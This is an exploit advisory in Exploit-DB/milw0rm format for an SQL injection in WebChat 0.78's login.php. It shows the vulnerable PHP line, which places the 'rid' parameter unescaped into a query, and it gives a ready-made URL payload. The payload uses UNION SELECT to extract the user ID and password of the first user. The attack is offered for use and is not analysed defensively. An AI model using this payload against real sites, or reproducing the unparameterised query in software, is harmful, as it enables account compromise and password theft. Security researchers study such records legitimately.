WebChat 0.78 - 'login.php?rid' SQL Injection

EDB-ID:

4125

Author:

r00t

Type:

webapps

Platform:

PHP

Published:

2007-06-28

#########################################################################
#
#               [webchat 0.78]
#
# Class:     SQL Injection
# Published  28/06/2007
# Remote:    Yes
# Critical   Level : Dangerous
# Site:      http://sourceforge.net/projects/webdev-webchat/
# Download:  http://downloads.sourceforge.net/webdev-webchat/webchat-078.zip?modtime=1046649600&big_mirror=0
# Author:    r00t
#########################################################################


               Vulnerable code:
               login.php
======================================================
<?
       $q = new DB_Chat;
       $q->query("select * from room where rid='$rid'");
       if ($q->next_record()) {
?>
=======================================================

               Exploit :
============================================================================================================
http://www.site.com/[web_chat]/login.php?rid=-1'%20UNION%20ALL%20SELECT%20uid,pass,null,null,null%20from%20user%20WHERE%20uid=1/*
============================================================================================================

               Thanks To:
======================================================
All Root@Shell members;
White_Sheep;
SparrowRulez;
st0ke;
======================================================

# milw0rm.com [2007-06-28]